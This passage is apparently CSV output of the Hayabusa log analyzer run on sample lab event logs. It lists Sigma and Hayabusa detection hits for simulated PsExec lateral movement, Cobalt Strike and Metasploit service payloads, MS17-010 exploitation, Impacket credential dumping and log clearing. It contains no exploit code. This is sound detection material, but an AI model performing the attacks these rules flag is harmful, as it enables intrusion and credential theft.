+09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 22:30:00.589 +09:00,-,-,low,Rare Schtasks Creations,[condition] 
count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\eviltask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service 
Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 
0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: 
admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec 
(GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 
0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 
0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote 
Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 